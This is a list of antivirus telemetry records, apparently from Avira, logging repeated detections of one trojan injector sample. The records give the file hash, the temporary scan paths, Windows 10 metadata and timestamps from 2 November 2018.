  Row(detection=Row(filename='avscan-20181102-054259-207becbe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054259-207BECBE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054621-98b54fbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054621-98B54FBD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051853-c2a63981', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051853-C2A63981', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053502-0443010d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053502-0443010D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051842-bbefda80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051842-BBEFDA80', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062013-542561f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062013-542561F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062040-64189a75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062040-64189A75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055105-41e6c56f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055105-41E6C56F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062048-68ac7814', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062048-68AC7814', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c4af1a48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C4AF1A48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055153-5e7e2492', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055153-5E7E2492', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054658-aed5b1bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054658-AED5B1BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055550-ec3feca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055550-EC3FECA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051842-bc0d53aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051842-BC0D53AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055123-4cf7fde5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055123-4CF7FDE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055156-60b6a0fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055156-60B6A0FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054244-17b035ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054244-17B035EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055506-d17fbd3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055506-D17FBD3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051817-aceffe3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051817-ACEFFE3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055555-ef247343', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055555-EF247343', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055519-d9889a0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055519-D9889A0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051827-b304cf78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051827-B304CF78', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055143-588b3338', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055143-588B3338', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062002-4d9e894a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062002-4D9E894A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062007-505438d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062007-505438D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062042-65396dab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062042-65396DAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054630-9e162abc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054630-9E162ABC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055115-47f9b406', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055115-47F9B406', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062007-50a60809', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062007-50A60809', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051831-b5a9047c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051831-B5A9047C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055116-4871efc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055116-4871EFC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051854-c2e87aa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051854-C2E87AA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055545-e91cb292', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055545-E91CB292', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055157-60eedb95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055157-60EEDB95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055537-e4634fcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055537-E4634FCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055140-56f29e65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055140-56F29E65', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051804-a534ce87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051804-A534CE87', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055140-572a1bc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055140-572A1BC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055130-513dfa94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055130-513DFA94', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054229-0e84d13d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054229-0E84D13D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055557-effe20cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055557-EFFE20CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055558-f0b2e471', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055558-F0B2E471', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062024-5a8d0b6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062024-5A8D0B6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062011-52ec2577', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062011-52EC2577', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055510-d4513b5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055510-D4513B5C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba4b41db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA4B41DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051836-b87b6d90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051836-B87B6D90', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051859-c64f7941', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051859-C64F7941', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062022-5987bebf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062022-5987BEBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062022-599fd270', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062022-599FD270', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055531-e0e2cde8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055531-E0E2CDE8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055551-ecc1c633', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055551-ECC1C633', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055524-dc71f6c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055524-DC71F6C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055518-d9070315', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055518-D9070315', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062017-56a638f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062017-56A638F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:16Z'), dt=datetime.date(2018, 11, 2)),
